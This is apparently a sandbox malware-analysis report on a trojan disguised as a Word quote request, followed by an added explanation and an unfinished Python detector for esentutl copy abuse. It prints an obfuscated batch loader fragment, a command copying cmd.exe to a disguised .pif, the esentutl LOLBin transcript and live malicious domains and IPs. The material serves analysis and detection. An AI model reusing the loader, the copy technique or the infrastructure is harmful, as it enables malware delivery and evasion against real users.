                                                                                                          http://www.apaescortatings.xyzReferer:explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.egos.designexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.xc31.topexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.upta.bio/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
URL | Source (process, memory dumps) | Malicious | Antivirus detection | Reputation
http://www.ynapticshiftai.tech | explorer.exe: 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi (truncated in the report) | explorer.exe: 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://api.msn.com/q | explorer.exe: 00000006.00000003.3107012452.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000000.1799656853.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000002.4174806858.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc (truncated in the report) | explorer.exe: 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1 (truncated in the report) | explorer.exe: 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.apaescortatings.xyz/d05n/www.ynthia-mcc-lin-tick.link | explorer.exe: 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ybzert.online/d05n/www.ynapticshiftai.tech | explorer.exe: 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apaescortatings.xyz | explorer.exe: 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg | explorer.exe: 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark | explorer.exe: 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A (truncated in the report) | explorer.exe: 00000006.00000000.1790982592.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.atingdilse.site | explorer.exe: 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ynapticshiftai.tech/d05n/www.eanliving.site | explorer.exe: 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://mbsngradnja.com/244_Rgzwnbqrkpn | #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe: 00000000.00000002.1781016526.0000000000597000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe: 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://www.eanliving.site | explorer.exe: 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.egos.design/d05n/www.xc31.top | explorer.exe: 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
77.105.36.123 | mbsngradnja.com | Serbia | 9125 | ORIONTELEKOM-ASRS | true
92.114.2.230 | voievodulgelu.ro | Romania | 6910 | DIALTELECOMRO | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1553904
Start date and time: 2024-11-11 19:15:51 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 34s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
renamed because original name is a hash value
(The #Uxxxx sequences are escaped non-ASCII characters. Decoded, the name is "Árajánlat kérés MOL093478524·docx.exe", Hungarian for "Quote request"; the character before "docx" is a middle dot (U+00B7), not a period, so the name reads as a Word document while the real extension is .exe.)
Original Sample Name: rajnlat krs MOL093478524docx.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@290/6@14/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 86
• Number of non-executed functions: 246
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtEnumerateKey calls found
• Report size getting too big, too many NtOpenKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
Time | Type | Description
13:16:45 | API Interceptor | 2x Sleep call for process: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe modified
13:17:00 | API Interceptor | 8587932x Sleep call for process: explorer.exe modified
13:17:38 | API Interceptor | 7433066x Sleep call for process: netsh.exe modified
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            77.105.36.123Ajanlatkeres_2024.05.29.PDF.exeGet hashmaliciousFormBook, LokibotBrowse
                                                                                                                            • mbsngradnja.com/YLc7afPlL4RjCeK.exe
                                                                                                                            92.114.2.230#U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                            • voievodulgelu.ro/244_Rgzwnbqrkpn
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            mbsngradnja.comConfirmation.docx.exeGet hashmaliciousDBatLoader, LokibotBrowse
                                                                                                                            • 77.105.36.123
                                                                                                                            megerosites.cmdGet hashmaliciousDBatLoader, LokibotBrowse
                                                                                                                            • 77.105.36.123
                                                                                                                            Uplata_391.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                            • 77.105.36.123
                                                                                                                            Ajanlatkeres_2024.05.29.PDF.exeGet hashmaliciousFormBook, LokibotBrowse
                                                                                                                            • 77.105.36.123
                                                                                                                            Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsmGet hashmaliciousFormBookBrowse
                                                                                                                            • 77.105.36.123
                                                                                                                            voievodulgelu.ro#U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                            • 92.114.2.230
                                                                                                                            Obavestenje o prilivu za 16000501003826304627.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                            • 92.114.2.230
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            ORIONTELEKOM-ASRSppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                            • 79.175.97.229
                                                                                                                            ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 178.254.155.221
                                                                                                                            jklppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.255.191.249
                                                                                                                            byte.arm.elfGet hashmaliciousOkiruBrowse
                                                                                                                            • 178.219.2.171
                                                                                                                            10145202485.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 77.105.36.128
                                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 109.121.40.179
                                                                                                                            f5#U06f6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 77.105.36.128
                                                                                                                            Confirmation.docx.exeGet hashmaliciousDBatLoader, LokibotBrowse
                                                                                                                            • 77.105.36.123
                                                                                                                            #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 77.105.36.128
                                                                                                                            botx.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 79.175.73.90
                                                                                                                            DIALTELECOMROAmalgamers.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 86.107.36.93
                                                                                                                            #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                            • 92.114.2.230
                                                                                                                            FLITTIGL.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                            • 86.107.36.93
                                                                                                                            splppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.209.98.177
                                                                                                                            la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 93.114.114.57
                                                                                                                            la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 46.102.13.204
                                                                                                                            SecuriteInfo.com.Win32.Sector.30.15961.3704.exeGet hashmaliciousSalityBrowse
                                                                                                                            • 89.41.154.115
                                                                                                                            n5h5BaL8q0.exeGet hashmaliciousSality, XWormBrowse
                                                                                                                            • 89.41.154.115
                                                                                                                            PfBjDhHzvV.exeGet hashmaliciousMetasploit, SalityBrowse
                                                                                                                            • 89.41.154.115
                                                                                                                            https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.htmlGet hashmaliciousUnknownBrowse
                                                                                                                            • 89.43.104.93
                                                                                                                            No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\Public\alpha.pif | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat | malicious | AgentTesla, DBatLoader
C:\Users\Public\alpha.pif | Qc238InLS3.exe | malicious | Remcos, DBatLoader
C:\Users\Public\alpha.pif | r876789878767.cmd | malicious | DBatLoader, FormBook
C:\Users\Public\alpha.pif | #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd | malicious | DBatLoader, FormBook
C:\Users\Public\alpha.pif | UR2WTRNmch.exe | malicious | Remcos, DBatLoader
C:\Users\Public\alpha.pif | 2tKeEoCCCw.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger
C:\Users\Public\alpha.pif | New_Order_PO_GM5637H93.cmd | malicious | AgentTesla, DBatLoader
C:\Users\Public\alpha.pif | E_dekont.cmd | malicious | DBatLoader, Nitol, PureLog Stealer, XWorm
C:\Users\Public\alpha.pif | z1Transaction_ID_REF2418_cmd.bat | malicious | AgentTesla, DBatLoader, PureLog Stealer
C:\Users\Public\alpha.pif | z1SWIFT_MT103_Payment_552016_cmd.bat | malicious | DBatLoader, FormBook
Process:C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4
Entropy (8bit):2.0
Encrypted:false
SSDEEP:3:iov:iov
MD5:BA64D7750A2764B4A814239B16694BED
SHA1:44173C517074791FFA5E7C49E221B73DA50D4F0D
SHA-256:9429C669F867AEECCD34ED938BEB917D650FC5557F1C0BF1CA67466A956E6041
SHA-512:CB45D037CA06583C8771685516313971D73C0571BBEF13D1AEB398E4E11BAF51379D878CC52DAAC107F9D1DE8F3709B3A86CFE8A42FCA7BE98159CE9D688FE7D
Malicious:false
Reputation:moderate, very likely benign file
Preview:74..
Process:C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
Category:dropped
Size (bytes):62357
Entropy (8bit):4.705712327109906
Encrypted:false
SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
MD5:B87F096CBC25570329E2BB59FEE57580
SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
Malicious:false
Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
Process:C:\Windows\SysWOW64\esentutl.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):236544
Entropy (8bit):6.4416694948877025
Encrypted:false
SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat, Detection: malicious
• Filename: Qc238InLS3.exe, Detection: malicious
• Filename: r876789878767.cmd, Detection: malicious
• Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd, Detection: malicious
• Filename: UR2WTRNmch.exe, Detection: malicious
• Filename: 2tKeEoCCCw.exe, Detection: malicious
• Filename: New_Order_PO_GM5637H93.cmd, Detection: malicious
• Filename: E_dekont.cmd, Detection: malicious
• Filename: z1Transaction_ID_REF2418_cmd.bat, Detection: malicious
• Filename: z1SWIFT_MT103_Payment_552016_cmd.bat, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\esentutl.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18944 (equal to the 0x4a00 bytes the esentutl copy transcript below reports reading from C:\Windows\System32\ping.exe, consistent with this being the ping.exe copy written as C:\Users\Public\xpha.pif)
Entropy (8bit):5.742964649637377
Encrypted:false
SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
MD5:B3624DD758CCECF93A1226CEF252CA12
SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\esentutl.exe
File Type:ASCII text, with CRLF, CR line terminators
Category:dropped
Size (bytes):560
Entropy (8bit):4.532578488470501
Encrypted:false
SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNX:/p4xT5cp7u0wQakB4aV4t8Nq
MD5:3590356B24CBB2F8E508903A82A31479
SHA1:229AF4E5E706A72DD87578DB5148486F39241E86
SHA-256:FDFB0F4095DF37BD607F769AC1D645CAED248BC4E251E8B0E76143004F6D7C2A
SHA-512:FEB02635FD1E447889750296757A6A8ABEA231762F2C4A70ED18A475468975A6F57B88105E7EE6C7A7DC66E6C30E8FC5569FD096BA72368BB177C0723DDECF0D
Malicious:false
Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.78 seconds.....
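The transcript above is what esentutl.exe writes when its "/y" copy mode is abused as a LOLBin to duplicate a system binary (here ping.exe) under a new name and extension in C:\Users\Public. Two artefacts of that technique are available to a detection engineer: the esentutl command line in process telemetry (esentutl /y <source> /d <destination> /o) and this transcript when the loader redirects it to disk. The checker below is an added example, not code from the report; SAMPLE_LOG is constructed after the 560-byte file above, the command lines are constructed, and the lists of system directories, user-writable directories and disguising extensions are assumptions chosen for the example.

```python
"""
Flag esentutl.exe being used as a copy primitive for Windows system binaries.

Added example, not code from the Joe Sandbox report. It parses two artefacts
the report shows esentutl producing: the copy command line
(esentutl /y <source> /d <destination> /o) and the "Initiating COPY FILE mode"
transcript the tool writes. Directory and extension lists are assumptions.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional

SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")
USER_WRITABLE = ("\\users\\public\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
# Extensions cmd.exe still executes but which hide that the file is a PE image.
DISGUISE_EXT = (".pif", ".com", ".scr", ".bat", ".cmd")

# Constructed after the dropped transcript. The report renders the paths with
# doubled backslashes; normalise() collapses them.
SAMPLE_LOG = "\r\n".join([
    "Initiating COPY FILE mode...",
    "    Source File: C:\\\\Windows\\\\System32\\\\ping.exe",
    "Destination File: C:\\\\Users\\\\Public\\\\xpha.pif",
    "",
    "    Copy Progress (% complete)",
    "          0    10   20   30   40   50   60   70   80   90  100",
    "          |----|----|----|----|----|----|----|----|----|----|",
    "          ...................................................",
    "",
    "Total bytes read = 0x4a00 (18944) (0 MB)",
    "Total bytes written = 0x5000 (20480) (0 MB)",
    "",
    "Operation completed successfully in 0.78 seconds.",
])
# Constructed command lines: one modelled on the alpha.pif drop, one legitimate database copy.
SAMPLE_CMD = r"esentutl.exe /y C:\Windows\System32\cmd.exe /d C:\Users\Public\alpha.pif /o"
BENIGN_CMD = r"esentutl.exe /y C:\Users\user\Documents\mail.edb /d D:\backup\mail.edb /o"

_CMD_RE = re.compile(r'/y\s+("[^"]+"|\S+)\s+/d\s+("[^"]+"|\S+)', re.IGNORECASE)


@dataclass
class CopyEvent:
    source: str
    destination: str
    bytes_read: Optional[int] = None   # only the transcript reports this


def normalise(path: str) -> str:
    """Lower-case, unquote and collapse doubled backslashes."""
    return re.sub(r"\\\\+", r"\\", path.strip().strip('"')).lower()


def parse_log(text: str) -> Optional[CopyEvent]:
    """Parse the transcript esentutl /y writes (the dropped 560-byte text file)."""
    if "COPY FILE mode" not in text:
        return None
    src = re.search(r"Source File:\s*([^\r\n]+)", text)
    dst = re.search(r"Destination File:\s*([^\r\n]+)", text)
    if not (src and dst):
        return None
    read = re.search(r"Total bytes read\s*=\s*0x([0-9a-fA-F]+)", text)
    return CopyEvent(normalise(src.group(1)), normalise(dst.group(1)),
                     int(read.group(1), 16) if read else None)


def parse_cmdline(cmdline: str) -> Optional[CopyEvent]:
    """Parse an esentutl /y <src> /d <dst> command line from process telemetry."""
    if "esentutl" not in cmdline.lower():
        return None
    m = _CMD_RE.search(cmdline)
    return CopyEvent(normalise(m.group(1)), normalise(m.group(2))) if m else None


def assess(ev: CopyEvent) -> List[str]:
    """Return the reasons a copy looks like LOLBin abuse; an empty list means no finding."""
    reasons: List[str] = []
    if any(d in ev.source for d in SYSTEM_DIRS):
        reasons.append("source is a Windows system binary")
    if any(d in ev.destination for d in USER_WRITABLE):
        reasons.append("destination is a user-writable directory")
    if ev.destination.endswith(DISGUISE_EXT):
        reasons.append("destination extension disguises an executable")
    src_ext, dst_ext = ntpath.splitext(ev.source)[1], ntpath.splitext(ev.destination)[1]
    if src_ext and src_ext != dst_ext:
        reasons.append(f"extension changed from {src_ext} to {dst_ext}")
    return reasons


if __name__ == "__main__":
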